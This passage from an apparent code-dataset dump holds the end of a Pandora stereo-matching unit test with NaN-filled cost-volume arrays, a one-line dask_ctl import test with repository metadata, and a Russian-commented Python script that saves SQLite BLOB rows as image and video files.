[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
],
dtype=np.float32,
)
# Cost volume ground truth after invalidation
cv_ground_truth = np.array(
[
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
],
dtype=np.float32,
)
matching_cost_ = matching_cost.AbstractMatchingCost(
**{
"matching_cost_method": "mc_cnn",
"window_size": 11,
"subpix": 1,
"mc_cnn_arch": "fast",
"model_path": "weights/mc_cnn_fast_mb_weights.pt",
}
)
cv = matching_cost_.compute_cost_volume(left, right, disp_min=-1, disp_max=1)
# Check if the calculated cost volume is equal to the ground truth (same shape and all elements equals)
np.testing.assert_array_equal(cv["cost_volume"].data, cv_before_invali)
# Masked cost volume with pandora function
matching_cost_.cv_masked(left, right, cv, -1, 1)
print(cv["cost_volume"].data)
# Check if the calculated cost volume is equal to the ground truth (same shape and all elements equals)
np.testing.assert_array_equal(cv["cost_volume"].data, cv_ground_truth)
# ------------ Test the method with a secondary mask ( reference mask contains valid pixels ) ------------
# Mask convention
# cfg['image']['valid_pixels'] = 0
# cfg['image']['no_data'] = 1
# invalid_pixels all other values
data = np.zeros((13, 13), dtype=np.float64)
data += 0.1
# Reference mask contains valid pixels
mask = np.zeros((13, 13), dtype=np.int16)
left = xr.Dataset(
{"im": (["row", "col"], data), "msk": (["row", "col"], mask)},
coords={"row": np.arange(data.shape[0]), "col": np.arange(data.shape[1])},
)
left.attrs["valid_pixels"] = 0
left.attrs["no_data_mask"] = 1
left.attrs["crs"] = None
left.attrs["transform"] = None
data = np.zeros((13, 13), dtype=np.float64)
data += 0.1
mask = np.array(
(
[
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
),
dtype=np.int16,
)
right = xr.Dataset(
{"im": (["row", "col"], data), "msk": (["row", "col"], mask)},
coords={"row": np.arange(data.shape[0]), "col": np.arange(data.shape[1])},
)
right.attrs["valid_pixels"] = 0
right.attrs["no_data_mask"] = 1
# Cost volume before invalidation, disparities = -1, 0, 1
cv_before_invali = np.array(
[
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
],
dtype=np.float32,
)
# Cost volume ground truth after invalidation
cv_ground_truth = np.array(
[
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, -1.0],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, np.nan],
[-1.0, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, np.nan],
[-1.0, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
],
dtype=np.float32,
)
matching_cost_ = matching_cost.AbstractMatchingCost(
**{
"matching_cost_method": "mc_cnn",
"window_size": 11,
"subpix": 1,
"mc_cnn_arch": "fast",
"model_path": "weights/mc_cnn_fast_mb_weights.pt",
}
)
cv = matching_cost_.compute_cost_volume(left, right, disp_min=-1, disp_max=1)
# Check if the calculated cost volume is equal to the ground truth (same shape and all elements equals)
np.testing.assert_array_equal(cv["cost_volume"].data, cv_before_invali)
# Masked cost volume with pandora function
matching_cost_.cv_masked(left, right, cv, -1, 1)
# Check if the calculated cost volume is equal to the ground truth (same shape and all elements equals)
np.testing.assert_array_equal(cv["cost_volume"].data, cv_ground_truth)
if __name__ == "__main__":
unittest.main()
| 40.800578 | 114 | 0.34946 | 5,367 | 42,351 | 2.731321 | 0.042668 | 0.67126 | 0.930691 | 1.329559 | 0.893103 | 0.879323 | 0.868681 | 0.868681 | 0.868681 | 0.868681 | 0 | 0.026562 | 0.485301 | 42,351 | 1,037 | 115 | 40.839923 | 0.645931 | 0.056032 | 0 | 0.885928 | 0 | 0 | 0.014945 | 0.003642 | 0 | 0 | 0 | 0 | 0.006397 | 1 | 0.004264 | false | 0 | 0.008529 | 0 | 0.014925 | 0.001066 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
28d5424f1fcea922e978d3bafb8b554ee7b7c036 | 60 | py | Python | dask_ctl/tests/test_dask_ctl.py | keewis/dask-ctl | 3d12a3fba5e0e1322936276c7b2955384614cc2f | [
"BSD-3-Clause"
] | 17 | 2021-01-21T17:39:30.000Z | 2022-03-04T10:11:37.000Z | dask_ctl/tests/test_dask_ctl.py | keewis/dask-ctl | 3d12a3fba5e0e1322936276c7b2955384614cc2f | [
"BSD-3-Clause"
] | 25 | 2021-01-21T19:27:39.000Z | 2022-03-29T08:27:56.000Z | dask_ctl/tests/test_dask_ctl.py | keewis/dask-ctl | 3d12a3fba5e0e1322936276c7b2955384614cc2f | [
"BSD-3-Clause"
] | 10 | 2021-01-21T19:37:43.000Z | 2022-03-03T17:20:03.000Z | def test_import():
import dask_ctl
assert dask_ctl
| 12 | 19 | 0.7 | 9 | 60 | 4.333333 | 0.666667 | 0.358974 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 60 | 4 | 20 | 15 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.666667 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e91e9a080b52942d2d178add4a8f3e13bcce5bd2 | 4,417 | py | Python | near-block-chain_output.py | tonypithony/Near-Block-Chain | 3ca62272f8c64d3e0b4ee07a964d76de4b09b164 | [
"MIT"
] | null | null | null | near-block-chain_output.py | tonypithony/Near-Block-Chain | 3ca62272f8c64d3e0b4ee07a964d76de4b09b164 | [
"MIT"
] | null | null | null | near-block-chain_output.py | tonypithony/Near-Block-Chain | 3ca62272f8c64d3e0b4ee07a964d76de4b09b164 | [
"MIT"
] | null | null | null | # Получение изображения и файла, сохраненных в виде BLOB
import sqlite3, os
def write_to_file(data, filename):
# Преобразование двоичных данных в нужный формат
with open(filename, 'wb') as file:
file.write(data)
print("Данный из blob сохранены в: ", filename, "\n")
def read_blob_data_jpg(emp_id):
try:
sqlite_connection = sqlite3.connect('sqlite_python_boobs.db')
cursor = sqlite_connection.cursor()
print("Подключен к SQLite")
sql_fetch_blob_query = """SELECT * from new_employee where id = ?"""
cursor.execute(sql_fetch_blob_query, (emp_id,))
record = cursor.fetchall()
for row in record:
print("Id = ", row[0], "Name = ", row[1])
name = row[1]
photo = row[2]
print("Сохранение изображения сотрудника и резюме на диске \n")
photo_path = os.path.join(name + ".jpg")
write_to_file(photo, photo_path)
cursor.close()
except sqlite3.Error as error:
print("Ошибка при работе с SQLite", error)
finally:
if sqlite_connection:
sqlite_connection.close()
print("Соединение с SQLite закрыто")
read_blob_data_jpg(1)
read_blob_data_jpg(2)
def read_blob_data_png(emp_id):
try:
sqlite_connection = sqlite3.connect('sqlite_python_boobs.db')
cursor = sqlite_connection.cursor()
print("Подключен к SQLite")
sql_fetch_blob_query = """SELECT * from new_employee where id = ?"""
cursor.execute(sql_fetch_blob_query, (emp_id,))
record = cursor.fetchall()
for row in record:
print("Id = ", row[0], "Name = ", row[1])
name = row[1]
photo = row[2]
print("Сохранение изображения сотрудника и резюме на диске \n")
photo_path = os.path.join(name + ".png")
write_to_file(photo, photo_path)
cursor.close()
except sqlite3.Error as error:
print("Ошибка при работе с SQLite", error)
finally:
if sqlite_connection:
sqlite_connection.close()
print("Соединение с SQLite закрыто")
read_blob_data_png(1)
read_blob_data_png(2)
def read_blob_data_gif(emp_id):
try:
sqlite_connection = sqlite3.connect('sqlite_python_boobs.db')
cursor = sqlite_connection.cursor()
print("Подключен к SQLite")
sql_fetch_blob_query = """SELECT * from new_employee where id = ?"""
cursor.execute(sql_fetch_blob_query, (emp_id,))
record = cursor.fetchall()
for row in record:
print("Id = ", row[0], "Name = ", row[1])
name = row[1]
photo = row[2]
print("Сохранение изображения сотрудника и резюме на диске \n")
photo_path = os.path.join(name + ".gif")
write_to_file(photo, photo_path)
cursor.close()
except sqlite3.Error as error:
print("Ошибка при работе с SQLite", error)
finally:
if sqlite_connection:
sqlite_connection.close()
print("Соединение с SQLite закрыто")
read_blob_data_gif(3)
def read_blob_data_mp4(emp_id):
try:
sqlite_connection = sqlite3.connect('sqlite_python_boobs.db')
cursor = sqlite_connection.cursor()
print("Подключен к SQLite")
sql_fetch_blob_query = """SELECT * from new_employee where id = ?"""
cursor.execute(sql_fetch_blob_query, (emp_id,))
record = cursor.fetchall()
for row in record:
print("Id = ", row[0], "Name = ", row[1])
name = row[1]
photo = row[2]
print("Сохранение изображения сотрудника и резюме на диске \n")
photo_path = os.path.join(name + ".mp4")
write_to_file(photo, photo_path)
cursor.close()
except sqlite3.Error as error:
print("Ошибка при работе с SQLite", error)
finally:
if sqlite_connection:
sqlite_connection.close()
print("Соединение с SQLite закрыто")
